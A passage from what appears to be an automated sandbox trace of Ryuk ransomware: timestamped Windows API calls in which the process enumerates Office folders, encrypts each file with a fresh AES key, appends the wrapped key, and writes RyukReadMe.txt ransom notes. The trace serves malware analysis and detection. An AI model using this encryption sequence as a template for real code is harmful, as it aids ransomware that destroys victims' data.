(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.888] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=131072) returned 1 [0142.888] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=131072) returned 1 [0142.888] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x1fede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.888] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0142.889] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.889] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0142.889] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.889] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.890] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x20000, lpOverlapped=0x0) returned 1 [0142.892] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0142.892] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x20000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x20010) returned 1 [0142.893] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.893] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x20010, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x20010, lpOverlapped=0x0) returned 1 [0142.893] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0142.894] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0142.894] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0142.894] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0142.894] CloseHandle (hObject=0x19c) returned 1 [0142.909] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.913] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.913] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.913] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF", dwFileAttributes=0x80) returned 1 [0142.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.914] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=114) returned 1 [0142.914] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=114) returned 1 [0142.914] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0142.914] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.914] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.914] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x72, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x72, lpOverlapped=0x0) returned 1 [0142.915] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0142.915] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x72, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x80) returned 1 [0142.915] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.915] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x80, lpOverlapped=0x0) returned 1 [0142.915] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0142.915] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0142.915] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0142.915] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0142.916] CloseHandle (hObject=0x19c) returned 1 [0142.941] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.946] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.946] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.946] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0142.946] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0142.946] SetLastError (dwErrCode=0x0) [0142.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.949] GetLastError () returned 0x0 [0142.949] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.949] CloseHandle (hObject=0x198) returned 1 [0142.950] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0142.950] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0142.950] SetLastError (dwErrCode=0x0) [0142.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.950] GetLastError () returned 0xb7 [0142.950] CloseHandle (hObject=0x194) returned 1 [0142.950] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.950] SetLastError (dwErrCode=0x0) [0142.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.950] GetLastError () returned 0xb7 [0142.950] CloseHandle (hObject=0x194) returned 1 [0142.950] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0142.950] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.950] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.950] SetLastError (dwErrCode=0x0) [0142.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.951] GetLastError () returned 0x0 [0142.951] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.953] CloseHandle (hObject=0x198) returned 1 [0142.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0142.953] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.954] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0142.954] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0142.954] SetLastError (dwErrCode=0x0) [0142.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.954] GetLastError () returned 0x0 [0142.954] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.955] CloseHandle (hObject=0x198) returned 1 [0142.955] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.955] SetLastError (dwErrCode=0x0) [0142.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.955] GetLastError () returned 0xb7 [0142.955] CloseHandle (hObject=0x198) returned 1 [0142.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0142.955] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.955] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0142.955] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0142.955] SetLastError (dwErrCode=0x0) [0142.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\user\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.956] GetLastError () returned 0x0 [0142.956] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.957] CloseHandle (hObject=0x198) returned 1 [0142.957] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0142.957] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0142.957] SetLastError (dwErrCode=0x0) [0142.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.957] GetLastError () returned 0xb7 [0142.957] CloseHandle (hObject=0x194) returned 1 [0142.957] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.957] SetLastError (dwErrCode=0x0) [0142.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.958] GetLastError () returned 0xb7 [0142.958] CloseHandle (hObject=0x194) returned 1 [0142.958] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0142.958] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.958] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.958] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.958] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig", dwFileAttributes=0x80) returned 1 [0142.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.960] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=128) returned 1 [0142.960] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=128) returned 1 [0142.960] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0142.960] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.960] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.960] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x80, lpOverlapped=0x0) returned 1 [0142.961] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0142.961] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x80, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x90) returned 1 [0142.961] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.961] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x90, lpOverlapped=0x0) returned 1 [0142.961] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0142.961] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0142.961] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0142.961] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0142.961] CloseHandle (hObject=0x198) returned 1 [0142.978] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.982] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.982] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.982] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml", dwFileAttributes=0x80) returned 1 [0142.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.983] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=2031) returned 1 [0142.983] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=2031) returned 1 [0142.983] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.983] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0142.984] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.984] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0142.984] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.984] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.984] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7ef, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x7ef, lpOverlapped=0x0) returned 1 [0142.985] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0142.985] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7ef, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7f0) returned 1 [0142.985] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.985] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x7f0, lpOverlapped=0x0) returned 1 [0142.985] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0142.985] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0142.985] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0142.985] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0142.985] CloseHandle (hObject=0x198) returned 1 [0143.002] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.006] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0143.006] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0143.006] SetLastError (dwErrCode=0x0) [0143.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.009] GetLastError () returned 0x0 [0143.009] WriteFile (in: hFile=0x194, 